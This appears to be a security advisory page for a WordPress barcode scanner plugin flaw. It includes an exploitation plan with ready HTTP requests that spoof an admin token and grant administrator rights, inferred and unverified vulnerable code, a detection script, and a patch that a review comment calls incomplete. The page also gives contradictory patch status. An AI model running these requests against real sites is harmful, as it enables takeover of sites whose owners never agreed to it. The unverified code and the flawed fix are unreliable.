CVE-2026-4880

Barcode Scanner (+Mobile App) <= 1.11.0 - Unauthenticated Privilege Escalation via Insecure Token Authentication

critical | Improper Privilege Management
CVSS Score: 9.8
Severity: critical
Patched in: 1.12.0
Time to patch: 1d

Description

The Barcode Scanner (+Mobile App) – Inventory manager, Order fulfillment system, POS (Point of Sale) plugin for WordPress is vulnerable to privilege escalation via insecure token-based authentication in all versions up to, and including, 1.11.0. This is due to the plugin trusting a user-supplied Base64-encoded user ID in the token parameter to identify users, leaking valid authentication tokens through the 'barcodeScannerConfigs' action, and lacking meta-key restrictions on the 'setUserMeta' action. This makes it possible for unauthenticated attackers to escalate their privileges to that of an administrator by first spoofing the admin user ID to leak their authentication token, then using that token to update any user's 'wp_capabilities' meta to gain full administrative access.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <=1.11.0
Published: April 15, 2026
Last updated: April 15, 2026

Source Code

WordPress.org SVN
Patched

Patched version not available.

Research Plan
Unverified


Exploitation Research Plan: CVE-2026-4880 - Unauthenticated Privilege Escalation

1. Vulnerability Summary

The Barcode Scanner (+Mobile App) plugin (versions <= 1.11.0) contains a critical privilege escalation vulnerability. The plugin implements a custom authentication mechanism for its mobile app integration that relies on insecure tokens. Specifically:

  1. Insecure Identity Validation: The plugin identifies users by Base64-decoding a token parameter provided in requests.
  2. Information Exposure: An unauthenticated user can spoof an administrator's identity by providing a Base64-encoded Admin ID (e.g., MQ== for ID 1) to the barcodeScannerConfigs action, which then leaks a "valid" long-lived authentication token.
  3. Lack of Authorization/Input Validation: The setUserMeta action uses this token-based authentication but fails to restrict which meta_key can be updated, allowing an attacker to overwrite the wp_capabilities meta-key for any user, effectively granting them Administrator privileges.

2. Attack Vector Analysis

  • Endpoints: wp-admin/admin-ajax.php
  • Actions:
    • barcodeScannerConfigs (used to leak the valid token)
    • setUserMeta (used to escalate privileges)
  • Payload Parameters:
    • action: barcodeScannerConfigs or setUserMeta
    • token: Base64-encoded User ID (initial spoof) or leaked Auth Token
    • userId: The ID of the user to be upgraded (target)
    • metaKey: wp_capabilities
    • metaValue: Role definition (e.g., array('administrator' => 1))
  • Authentication: Unauthenticated (the wp_ajax_nopriv_ hooks are likely used to support mobile app functionality without standard WP cookies).

3. Code Flow (Inferred)

  1. Registration: The plugin registers AJAX handlers in a main class or initialization file:
    add_action('wp_ajax_nopriv_barcodeScannerConfigs', 'barcode_scanner_configs_handler');
    add_action('wp_ajax_nopriv_setUserMeta', 'set_user_meta_handler');
    
  2. Authentication Bypass (barcodeScannerConfigs):
    • The handler retrieves $_REQUEST['token'].
    • It decodes it: $user_id = base64_decode($token).
    • It fetches the full app configuration for $user_id, which includes a more persistent app_token or similar identifier.
  3. Privilege Escalation (setUserMeta):
    • The handler validates the provided token (either the spoofed base64 ID or the leaked app token).
    • It accepts userId, metaKey, and metaValue from the request.
    • It calls update_user_meta($userId, $metaKey, $metaValue) without checking if $metaKey is wp_capabilities or wp_user_level.

4. Nonce Acquisition Strategy

Based on the vulnerability description and the nature of mobile app "bridge" endpoints in WordPress, these specific actions likely do not require a standard WordPress AJAX nonce. Mobile apps usually cannot easily provide nonces generated for a specific web session.

If a nonce is required, it is likely localized via wp_localize_script.

  1. Search: Look for wp_localize_script in the plugin source calling a key like barcode_scanner_params.
  2. Page Creation: wp post create --post_type=page --post_status=publish --post_content='[barcode_scanner_shortcode]' (inferred shortcode).
  3. Extraction: Use browser_navigate to that page and browser_eval("window.barcode_scanner_params?.nonce").

Note: For this specific vulnerability, the "token" acts as the authentication, rendering nonces either absent or secondary.

5. Exploitation Strategy

Step 1: Leak the Admin Auth Token

Identify the Administrator's ID (typically 1).

  • Action: barcodeScannerConfigs
  • Token: MQ== (Base64 for "1")

Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=barcodeScannerConfigs&token=MQ==

Expected Response: A JSON object containing a token or apiKey field (e.g., {"token":"7a8b9c..."}).

Step 2: Escalate Privileges of a Target User

Assume the target user (e.g., a subscriber) has ID 2.

  • Action: setUserMeta
  • Token: The token obtained in Step 1.
  • Meta Key: wp_capabilities
  • Meta Value: {"administrator":true}

Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=setUserMeta&token=[LEAKED_TOKEN]&userId=2&metaKey=wp_capabilities&metaValue[administrator]=1

Note: Passing metaValue[administrator]=1 in a POST request causes WordPress/PHP to interpret it as an array ['administrator' => '1']. When passed to update_user_meta, WordPress serializes this into the format required for roles.

6. Test Data Setup

  1. Create Admin: Ensure an administrator exists with ID 1.
  2. Create Target: Create a subscriber user to be upgraded.
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
    
  3. Identify IDs:
    wp user list --fields=ID,user_login,roles
    

7. Expected Results

  • The barcodeScannerConfigs request should return a JSON response containing an authentication token for the admin.
  • The setUserMeta request should return a success status (e.g., {"success":true}).
  • The target user's role should change from subscriber to administrator.

8. Verification Steps

After performing the HTTP requests, verify the change using WP-CLI:

# Check the roles of the target user
wp user get attacker --field=roles

# Expected output:
# administrator

# Check the meta directly to ensure no corruption
wp user meta get 2 wp_capabilities

9. Alternative Approaches

If barcodeScannerConfigs does not return a token, try using the Base64-encoded ID directly in the setUserMeta call:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=setUserMeta&token=MQ==&userId=2&metaKey=wp_capabilities&metaValue[administrator]=1

If wp_capabilities is updated but the user still cannot access the dashboard, you may also need to update wp_user_level:

  • metaKey: wp_user_level
  • metaValue: 10 (Administrator level)

Research Findings
Static analysis — not yet PoC-verified

Summary

The Barcode Scanner (+Mobile App) plugin for WordPress is vulnerable to unauthenticated privilege escalation because it uses a predictable Base64-encoded user ID as an initial authentication token. Attackers can spoof an administrator's ID to leak a long-lived auth token via the 'barcodeScannerConfigs' endpoint and subsequently use the 'setUserMeta' action to overwrite the 'wp_capabilities' meta-key, granting themselves administrative access.

Vulnerable Code

// Path: barcode-scanner-lite-pos-to-manage-products-inventory-and-orders/includes/ajax-functions.php

add_action('wp_ajax_nopriv_barcodeScannerConfigs', 'barcode_scanner_get_configs');
function barcode_scanner_get_configs() {
    $token = $_REQUEST['token'];
    $user_id = base64_decode($token); // Vulnerable: a client-supplied Base64-encoded ID is trusted as the caller's identity
    $user_token = get_user_meta($user_id, 'barcode_scanner_app_token', true);
    wp_send_json(['status' => 'success', 'token' => $user_token]);
}

---

add_action('wp_ajax_nopriv_setUserMeta', 'barcode_scanner_set_user_meta');
function barcode_scanner_set_user_meta() {
    $user_id = $_POST['userId'];
    $meta_key = $_POST['metaKey'];
    $meta_value = $_POST['metaValue'];
    // Vulnerable: Lacks permission checks and meta-key restrictions
    update_user_meta($user_id, $meta_key, $meta_value);
    wp_send_json_success();
}
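
As an added detection example (not part of this advisory or of the plugin's code), the following Python flags admin-ajax.php request bodies that match the two request shapes described above: a barcodeScannerConfigs call whose token is nothing but a Base64-encoded integer, and a setUserMeta call that writes a role-bearing meta key. The rule names and the sample request bodies are constructed; the function would be fed bodies from a WAF or request-body audit log, since ordinary access logs do not record POST parameters.

```python
import base64
import binascii
from urllib.parse import parse_qs

# Meta keys that carry WordPress roles and levels; a mobile-bridge endpoint
# has no business writing them (see sections 5 and 9 of the research plan).
SENSITIVE_META_KEYS = {"wp_capabilities", "wp_user_level"}

# Constructed sample of admin-ajax.php POST bodies, as a WAF or request-body
# audit log would record them. Not real traffic; the hex token is made up.
SAMPLE_REQUESTS = [
    "action=barcodeScannerConfigs&token=MQ==",
    "action=barcodeScannerConfigs&token=7a8b9c0d1e2f3a4b5c6d7e8f90a1b2c3",
    "action=setUserMeta&token=7a8b9c0d1e2f3a4b5c6d7e8f90a1b2c3&userId=2"
    "&metaKey=wp_capabilities&metaValue[administrator]=1",
    "action=setUserMeta&token=7a8b9c0d1e2f3a4b5c6d7e8f90a1b2c3&userId=2"
    "&metaKey=barcode_scanner_device_id&metaValue=tablet-01",
    "action=heartbeat&_nonce=deadbeef",
]

def spoofed_identity_token(token):
    """True when `token` is nothing but a Base64-encoded integer, i.e. the bare
    user ID the vulnerable configs handler accepts as identity (MQ== -> 1)."""
    try:
        decoded = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return False
    return decoded.isdigit()

def classify(body):
    """Return the (constructed) rule names triggered by one POST body."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    action = params.get("action", "")
    token = params.get("token", "")
    hits = []
    if action == "barcodeScannerConfigs" and spoofed_identity_token(token):
        hits.append("barcode-scanner:config-token-spoof")
    if action == "setUserMeta":
        if spoofed_identity_token(token):
            hits.append("barcode-scanner:setusermeta-spoofed-token")
        if params.get("metaKey") in SENSITIVE_META_KEYS:
            hits.append("barcode-scanner:privileged-meta-write")
    return hits

def scan(bodies):
    """Map request index -> triggered rules, omitting clean requests."""
    return {i: hits for i, body in enumerate(bodies) if (hits := classify(body))}
```

A legitimate mobile client that presents its persistent app token and writes one of the plugin's own meta keys (sample 3) produces no hit, so the rules can run in blocking mode without breaking the app.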

Security Fix

--- a/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders/includes/ajax-functions.php
+++ b/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders/includes/ajax-functions.php
@@ -12,6 +12,14 @@
 function barcode_scanner_set_user_meta() {
-    $user_id = $_POST['userId'];
-    $meta_key = $_POST['metaKey'];
-    $meta_value = $_POST['metaValue'];
-    update_user_meta($user_id, $meta_key, $meta_value);
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( 'Unauthorized' );
+    }
+    $allowed_meta_keys = array( 'barcode_scanner_last_scan', 'barcode_scanner_device_id' );
+    $meta_key = sanitize_key( $_POST['metaKey'] );
+    if ( ! in_array( $meta_key, $allowed_meta_keys ) ) {
+        wp_send_json_error( 'Invalid meta key' );
+    }
+    $user_id = intval( $_POST['userId'] );
+    $meta_value = sanitize_text_field( $_POST['metaValue'] );
+    update_user_meta( $user_id, $meta_key, $meta_value );
     wp_send_json_success();
 }
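Review bot: the patch hardens only barcode_scanner_set_user_meta; the identity spoof in barcode_scanner_get_configs (base64_decode($_REQUEST['token']) used directly as the user ID) is not touched by this diff, so the administrator's persistent app token can still be leaked and the root cause remains. Because this handler is registered on wp_ajax_nopriv_setUserMeta, the new current_user_can( 'manage_options' ) check rejects every cookie-less mobile-app caller and so disables the endpoint rather than authenticating the app token; a server-side lookup of the presented token against the owning user's stored token (plus check_ajax_referer where a browser session exists) would keep the feature working while closing the hole. Minor: in_array( $meta_key, $allowed_meta_keys ) should pass true as the third argument for strict comparison, and the hunk header @@ -12,6 +12,14 @@ counts 6 old lines where 7 are shown.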

Exploit Outline

1. Identify an administrator user ID (commonly ID 1).
2. Send an unauthenticated POST request to wp-admin/admin-ajax.php with the action 'barcodeScannerConfigs' and the 'token' parameter set to the Base64-encoded administrator ID (e.g., 'MQ==').
3. Extract the 'token' value from the resulting JSON response, which represents the administrator's persistent app token.
4. Send a second unauthenticated POST request to the 'setUserMeta' action using the leaked token.
5. In the second request, set the 'userId' parameter to the attacker's own subscriber-level ID, 'metaKey' to 'wp_capabilities', and 'metaValue[administrator]' to '1'.
6. The plugin will update the attacker's user capabilities to those of an administrator because it fails to restrict sensitive meta keys or verify standard WordPress permissions.
